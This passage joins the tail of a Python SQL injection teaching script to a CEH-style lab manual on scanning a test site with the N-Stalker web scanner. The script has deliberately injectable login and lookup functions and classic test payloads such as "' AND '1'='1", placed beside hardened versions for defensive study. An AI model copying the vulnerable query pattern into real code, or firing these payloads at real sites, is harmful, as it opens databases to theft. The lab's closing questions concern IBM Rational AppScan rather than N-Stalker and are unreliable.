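        [(1, "alice", "correct horse"), (2, "bob", "battery staple")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Defective form: input is spliced into the statement text, so a quote in
    the input is read by the engine as a string-literal delimiter."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened form: bound parameters travel separately from the statement,
    so no input can change the query's structure."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def user_by_id_vulnerable(conn, user_id):
    """Defective form for a numeric field: the value is never type-checked."""
    row = conn.execute("SELECT username FROM users WHERE id = " + user_id).fetchone()
    return row[0] if row else None


def user_by_id_safe(conn, user_id):
    """Hardened form: enforce the expected type before anything reaches SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return None  # reject instead of forwarding the text to the engine
    row = conn.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None


# --- the scanner's checks, written as regression tests a developer can keep ---

def error_based_check(login_fn, conn) -> bool:
    """Error-based check: a lone quote in a field must not produce a database
    syntax error. Returns True when the function is flagged."""
    try:
        login_fn(conn, "alice'", "x")
    except sqlite3.Error:
        return True
    return False


def boolean_based_check(login_fn, conn, user, secret) -> bool:
    """Blind (true/false) check: append an always-true and an always-false
    condition to a valid user name. Differing answers mean the database
    evaluated the condition, i.e. the input was executed as SQL."""
    true_case = login_fn(conn, user + "' AND '1'='1", secret)
    false_case = login_fn(conn, user + "' AND '1'='2", secret)
    return true_case != false_case


def type_check(lookup_fn, conn) -> bool:
    """Typing check: text where a number is expected must be rejected by the
    application, not handed to the engine. Returns True when flagged."""
    try:
        lookup_fn(conn, "abc")
    except sqlite3.Error:
        return True
    return False


def run_checks() -> dict:
    """Run every check against both forms; the hardened ones must stay False."""
    conn = make_db()
    return {
        "login_vulnerable/error": error_based_check(login_vulnerable, conn),
        "login_vulnerable/boolean": boolean_based_check(login_vulnerable, conn, "alice", "correct horse"),
        "login_safe/error": error_based_check(login_safe, conn),
        "login_safe/boolean": boolean_based_check(login_safe, conn, "alice", "correct horse"),
        "user_by_id_vulnerable/type": type_check(user_by_id_vulnerable, conn),
        "user_by_id_safe/type": type_check(user_by_id_safe, conn),
    }


if __name__ == "__main__":
    for name, flagged in run_checks().items():
        print(f"{name:30s} {'FLAGGED' if flagged else 'ok'}")
```

The three checks flag only the two defective functions; the parameterized and type-checked versions pass all of them.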
Testing for SQL Injection Using N-Stalker Tool

N-Stalker Web Application Security Scanner 2012 is a sophisticated Web Security Assessment solution for your web applications. By incorporating the well-known "N-Stealth HTTP Security Scanner" and its 39,000 Web Attack Signature database along with a patent-pending component-oriented Web Application Security Assessment technology, N-Stalker is a "must have" security tool for developers, system/security administrators, IT auditors, and staff.

Lab Scenario

In the previous lab you examined how to use the WebCruiser tool to scan a website as well as run a POC (Proof Of Concept) for web vulnerabilities such as SQL injection. Some attackers perform SQL injection attacks based on an "error message" received from the server. If an error is returned by the application, the attacker can determine the entire structure of the database, and read any value that can be read by the account the ASP application is using to connect to the SQL Server. However, if an error message is returned from the database server complaining that the SQL query's syntax is incorrect, an attacker tries all possible true and false questions through SQL statements to steal data.

As an expert security professional and penetration tester you should be familiar with the tips and tricks used in SQL injection detection. You must also be aware of all the tools that can be used to detect SQL injection flaws. In this lab you will learn to use the tool N-Stalker to detect SQL injection attacks in websites.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 14 SQL Injection.

Lab Objectives

The objective of this lab is to help students learn how to test web applications for SQL Injection threats and vulnerabilities. In this lab, you will learn to:
■ Perform website scans for vulnerabilities
■ Analyze scanned results
■ Fix vulnerabilities in web applications
■ Generate reports for scanned web applications

Lab Environment

You can download N-Stalker from http://www.nstalker.com/products/editions/free/download.

To carry out the lab, you need:
■ N-Stalker, located at D:\CEH-Tools\CEHv8 Module 14 SQL Injection\SQL Injection Detection Tools\N-Stalker Web Application Security Scanner
■ Run this tool in Windows Server 2012
■ You can also download the latest version of N-Stalker from the link http://www.nstalker.com/products/editions/free/download
■ A web browser with Internet access
■ Microsoft .NET Framework Version 4.0 or later

Founded upon the U.S. Patent Registered Technology of Component-oriented Web Application Security Scanning, N-Stalker Enterprise Edition allows for assessment of Web Applications.

Lab Duration

Time: 20 Minutes

Overview of Testing Web Applications

Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and to employ multiple testing techniques.

TASK 1: Testing Web Application

Lab Tasks

1. To launch N-Stalker, move your mouse cursor to the lower-left corner of your desktop and click Start.

N-Stalker Web Application Security Scanner 2012 Enterprise Edition provides the most complete and effective suite of Web Security assessment checks to enhance the overall security of your Web Applications against a wide range of vulnerabilities and sophisticated hacker attacks.

FIGURE 4.1: Windows Server 2012 Desktop view

2. Click the N-Stalker Free 2012 app to launch it.
N-Stalker also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues and real security vulnerabilities that can be explored by external agents.

FIGURE 4.2: Windows Server 2012 Start menu Apps

3. Click the Update button to update the N-Stalker database in the main window of N-Stalker, as shown in the following screenshot.

Web Security Intelligence Service (WSIS) is provided by WSI Labs and will ensure you always get the latest updates available for N-Stalker Web Application Security Scanner as well as for its attack signature database. New 0-day exploits and common vulnerabilities will be added on a daily or weekly basis, giving you the ability to scan your Web Server infrastructure periodically against the latest threats.

FIGURE 4.3: N-Stalker Main window

4. A software disclaimer pop-up will appear. Click OK to continue.

System Requirement: .NET Framework V2.0 or higher; you can download .NET Framework V2.0 from Microsoft.

FIGURE 4.4: N-Stalker Free Edition pop-up

5. N-Stalker will start updating the database; it will take some time to update.
To run N-Stalker Web Application Security Scanner appropriately, there are minimum requirements to be met:
• 128MB RAM (available to N-Stalker)
• At least 500MB Hard Disk free space (caching purposes)
• Win32 Platform (Win 2000, XP, 2003 or Vista and later)
• Internet connection to download N-Stalker database/software updates

FIGURE 4.5: N-Stalker database updating status

6. After updating is complete, click Start to start a new scanning session.

You may modify N-Stalker's cache options to avoid web pages from being permanently stored on your hard disk. This might be useful to preserve disk space on large assessments.

FIGURE 4.6: N-Stalker database updated

7. In N-Stalker Scan Wizard, enter the URL as http://10.0.0.2/realhome/ (this IP address is where the realhome website is hosted).

8. Set the Scan Policy as OWASP Policy, and click Next.
[Screenshot: the N-Stalker Scan Wizard "Start Web Application Security Scan Session" page, with the Web Application URL set to http://10.0.0.2/realhome/, a Choose Scan Policy selector, and options to load a saved scan session, load spider data from a previously saved session, or use the local cache from a previously saved session.]

To run N-Stalker Scanner from the command line, you will need a scan session policy that will contain policies, host information and specific configurations needed to run the entire session.

FIGURE 4.7: N-Stalker Choosing URL and Policy

9. Click Yes in the URI Restriction Found pop-up to continue.

N-Stalker HTTP Brute Force tool does what the name says. It is an HTTP authentication brute force tool that works by taking a web macro and attempting to run a series of authentication requests to obtain valid credentials (you may provide your own user and password list).

[Screenshot: the URI Restriction Found dialog reads "You have provided the following page/directory pattern: [/realhome/]. Do you want to restrict your scan to the above directory only?" with Yes and No buttons.]

FIGURE 4.8: N-Stalker URI Restriction Found pop-up

10. In Optimize Settings, click Next to continue.

N-Stalker Web Proxy is a combination of web proxy and HTTP inspection tool. It includes full Web Proxy support (for external browsers) along with an event-driven interception mechanism that allows you to inspect HTTP communications (even SSL) based on keyword matching.

FIGURE 4.9: N-Stalker Optimize Settings

11. Click Yes in the Optimize Settings pop-up.
The term "GHDB" was allegedly coined by Johnny Long, who started to maintain a number of "google-based" queries that would eventually reveal security flaws in websites (without one having to scan the site directly for that vulnerability).

[Screenshot: the Settings Not Optimized dialog reads "You haven't optimized your scan settings yet but we strongly recommend you to do that. Do you want to continue anyway?" with Yes and No buttons.]

FIGURE 4.10: N-Stalker pop-up

12. On the Review Summary tab, click Start Session to continue.

This is a string encoding tool which is useful to encode/decode data in multiple formats used by Web Applications.

[Screenshot: the Review Summary lists Host Information [10.0.0.2] Port: [80] SSL: [no]; Restricted Directory /realhome/; Policy Name OWASP Policy; False-Positive Settings enabled for multiple extensions and for 404 pages; New Server Discovery enabled (recommended in most cases); Spider Engine Max URLs [500], Max Per Node [30], Max Depth [0]; HTML Parser JS [Execute/Parse], External JS [Deny], JS Events [Execute]; Server Technologies N/A; Allowed Hosts: no additional hosts configured.]

FIGURE 4.11: N-Stalker Review Summary

13. The N-Stalker Free Edition pop-up displays a message. Click OK to continue.

This is a Web Server Discovery tool which will attempt to discover HTTP servers and fingerprint them to obtain their platform version. It might run based on a file list or IP range.

[Screenshot: the N-Stalker Free Edition dialog reads "N-Stalker Free Edition has a restriction to crawl only the first 500 pages within the same scan session. For more information about our Commercial Edition, please, contact us: E-mail: sales@nstalker.com Phone: +55-11-3675-7093 (GMT-0300)".]

FIGURE 4.12: N-Stalker Free Edition pop-up

14. Click Start Scan after completing the configuration of N-Stalker.
Google Hacking Database (GHDB) Tool is a unique application that will allow you to search for "google-like" queries within saved spider data. In N-Stalker, the GHDB Tool can be invoked by clicking on the "GHDB Tool" button under "Miscellaneous Tools".

15. You can view scanning details as shown in the following screenshot.

HTTP Load Tester is a performance tester tool. It will run a Web Macro on a concurrent basis (up to you to decide how many instances) and will provide a report on the number of connection failures and successes.

FIGURE 4.14: N-Stalker Start Scan Status

16. N-Stalker will scan the site with four different methods.

Macro Recorder is a tool to manage "Web Macros" within N-Stalker Web Application Security Scanner.

FIGURE 4.15: N-Stalker Scanning methods

17. In the left pane, the Website tree displays the pages of the website.
Note: A "Web Macro" is a user-provided navigation script that is usually recorded using a web browser and a web proxy tool. Macro Recorder also allows you to insert URLs manually, and you must choose between an authentication macro and a navigation macro.

FIGURE 4.16: N-Stalker Website Tree

18. In the Results Wizard, select the relevant options as shown in the following screenshot and click Next.

Note: An authentication Web Macro is used to authenticate N-Stalker against web forms or any other form of user-interaction-based authentication.

The Results Wizard reports (screenshot content): "Scan Session has finished successfully. N-Stalker found 12 vulnerabilities." Total Scan Time: 0 Hour(s) 4 Minute(s). Total Vulnerabilities: High: 0, Medium: 0, Low: 2, Info: 10. Session Management Options: Save scan results (selected) / Discard scan results. Next Steps: Close scan session and return to main screen / Open N-Stalker Report Manager / Keep scan session for further analysis (selected).

FIGURE 4.17: N-Stalker Results Wizard

Note: As applications provide a means both to log in and to log off, Authentication Macros have a "logout detection" control that can be configured to prevent accidental logoff.

19. N-Stalker displays the summary of vulnerabilities. Click Done.
Note: A navigation Web Macro is used to provide a specific path within the application to be followed by N-Stalker's spider engine.

The Summary screen repeats the session result ("Scan Session has finished successfully. N-Stalker found 12 vulnerabilities"; Total Scan Time 0 Hour(s) 4 Minute(s); High: 0, Medium: 0, Low: 2, Info: 10) and lists the application objects found:

  Application Object        Count
  Total Web Pages           8
  High Vulnerabilities      0
  Medium Vulnerabilities    0
  Low Vulnerabilities       2
  Info Vulnerabilities      10
  Total Hosts Found         1
  Total HTTP Cookies        0
  Total Directories Found   0
  Total Web Forms Found     3
  Total Password Forms      0
  Total E-mails Found       0
  Total Client Scripts      9

  "Your request has been successfully processed."

Note: When you are generating reports, N-Stalker allows you to customize the template and the data used to generate the final report. Both executive and technical reports allow that customization.

FIGURE 4.18: N-Stalker Summary

20. You can view the complete scan results of the URL in the main dashboard of N-Stalker. The dashboard (N-Stalker Web Application Security Scanner 2012 Free Edition) lists findings such as "Google Hacking Database (GHDB) Signature Found".

Note: These macros can use any URLs and will not be prevented from calling external services within N-Stalker's spider engine.

FIGURE 4.19: N-Stalker Dashboard

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

  Tool/Utility   Information Collected/Objectives Achieved
  N-Stalker      Scan session successfully processed with 12 vulnerabilities detected (High: 0, Medium: 0, Low: 2, Info: 10)
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how to speed up the scanning process and reduce the number of pages IBM Rational AppScan finds.
2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site?
3. Analyze how variables can be implemented in a multi-step sequence with IBM Rational AppScan.

Internet Connection Required
☐ Yes ☐ No

Platform Supported
☑ Classroom ☑ iLabs
